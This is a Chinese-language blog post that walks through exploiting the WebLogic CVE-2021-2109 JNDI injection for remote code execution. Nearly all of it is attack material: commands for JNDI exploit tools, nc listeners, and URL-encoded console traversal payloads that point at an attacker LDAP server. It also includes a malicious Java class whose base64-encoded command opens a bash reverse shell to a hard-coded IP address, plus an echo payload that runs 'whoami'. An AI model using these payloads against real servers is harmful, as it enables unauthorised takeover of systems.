c1ay's blog

weblogic cve-2021-2109 jndi注入 远程代码执行复现

字数统计: 450阅读时长: 2 min
2021/01/22 Share

影响版本

Weblogic Server 10.3.6.0.0
Weblogic Server 12.1.3.0.0
Weblogic Server 12.2.1.3.0
Weblogic Server 12.2.1.4.0
Weblogic Server 14.1.1.0.0

利用方式一:无回显利用-反弹shell

1、工具github地址:
https://github.com/welk1n/JNDI-Injection-Exploit/releases

vps上执行:

1
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "反弹shell的命令" -A "vpsip"

mark

vps监听端口:

1
nc -nvlp 8888

poc:

1
http://192.168.157.189:49163/console/css/%252E%252E%252Fconsolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://4x.xxx.xxx;xxx:1389/01hohc;AdminServer%22)

反弹成功

mark

2、也可以直接通过marshalsec-0.0.3-SNAPSHOT-all.jar这个工具进行复现:

vps上执行:

启动JNDI服务

1
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://vpsip:8080/#evilclass

启动HTTPServer:

1
python -m SimpleHTTPServer 8080

http目录下放置恶意class文件,evilclass.class源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import java.lang.Runtime;
import java.lang.Process;
public class evilclass {
public evilclass() {
try{
String commands = "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDUuMTg2LjE0Ni84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}";
Process pc = Runtime.getRuntime().exec(commands);
pc.waitFor();
} catch(Exception e){
e.printStackTrace();
}
}
public static void main(String[] argv) {
evilclass e = new evilclass();
}
}

vps监听端口:

1
nc -nvlp 8888

poc:

1
http://192.168.157.189:49163/console/css/%252E%252E%252Fconsolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://4x.xxx.xxx;xxx:1389/evilclass;AdminServer%22)

mark

mark

mark

利用方式二:回显利用

工具github地址:
https://github.com/feihong-cs/JNDIExploit/releases/

vps上执行:

1
java -jar JNDIExploit-v1.11.jar -i vpsip

mark

poc:

1
2
3
4
5
6
7
8
9
GET /console/css/%252E%252E%252Fconsolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://4x.xxx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
Host: 192.168.157.189:49163
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
cmd: whoami

mark

CATALOG
  1. 1. 影响版本
  2. 2. 利用方式一:无回显利用-反弹shell
  3. 3. 利用方式二:回显利用